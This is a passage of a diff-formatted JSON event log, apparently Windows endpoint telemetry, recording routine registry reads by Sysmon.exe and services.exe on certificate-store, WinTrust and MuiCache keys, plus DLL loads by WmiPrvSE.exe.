2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ntasn1.dll", - "image_path": "C:\\Windows\\System32\\ntasn1.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847770000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - "image_name": "cfgbkend.dll", - "image_path": "C:\\Windows\\System32\\cfgbkend.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847770000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 